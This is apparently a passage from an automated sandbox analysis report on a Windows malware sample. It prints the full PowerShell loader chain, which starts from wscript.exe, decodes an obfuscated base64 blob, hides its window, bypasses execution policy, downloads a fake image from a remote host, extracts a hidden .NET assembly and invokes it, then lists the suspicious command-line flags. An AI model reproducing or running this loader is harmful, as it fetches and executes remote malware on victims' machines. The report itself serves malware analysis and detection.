NgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | wscript.exe | martian_process | powershell -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |